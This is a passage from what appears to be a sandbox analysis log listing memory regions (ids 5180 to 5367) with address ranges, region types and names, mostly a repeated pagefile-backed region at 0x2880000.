"pagefile_0x0000000002880000" filename = "" Region: id = 5180 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5181 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5182 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5183 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5184 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5185 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5186 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5187 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5188 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5189 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5190 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5191 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5192 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5193 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5194 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5195 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5196 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5197 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5198 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5199 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5200 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5201 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5202 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5203 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5204 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5205 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5206 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5207 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5208 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5209 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5210 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5211 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5212 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5213 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5214 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5215 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5216 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5217 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5218 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5219 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5220 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5221 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5222 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5223 start_va = 0x2880000 end_va = 0x2880fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5224 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5225 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5226 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5227 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5228 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5229 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5230 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5231 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5232 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5233 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5234 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5235 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5236 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5237 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5238 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5239 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5240 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5241 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5242 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5243 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5244 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5245 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5246 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5247 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5248 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5249 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5250 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5251 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5252 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5253 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5254 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5255 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5256 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5257 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5258 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5259 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5260 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5261 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5262 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5263 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5264 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5265 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5266 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5267 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5268 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5269 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5270 start_va = 0x2880000 end_va = 0x2880fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5271 start_va = 0x2880000 end_va = 0x288ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 5272 start_va = 0x4120000 end_va = 0x413ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 5273 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5274 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5275 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5276 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5277 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5278 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5279 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5280 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5281 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5282 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5283 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5284 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5285 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5286 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5287 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5288 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5289 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5290 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5291 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5292 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5293 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5294 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5295 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5296 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5297 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5298 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5299 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5300 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5301 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5302 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5303 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5304 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5305 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5306 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5307 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5308 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5309 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5310 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5311 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5312 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5313 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5314 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5315 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5316 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5317 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5318 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5319 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5320 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5321 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5322 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5323 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5324 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5325 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5326 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5327 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5328 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5329 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5330 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5331 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5332 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5333 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5334 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5335 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5336 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5337 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5338 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5339 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5340 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5341 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5342 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5343 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5344 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5345 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5346 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5347 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5348 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5349 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5350 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5351 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5352 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5353 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5354 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5355 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5356 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5357 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5358 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5359 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5360 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5361 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5362 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5363 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5364 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5365 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5366 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5367 start_va = 0x2880000 end_va = 0x288efff monitored 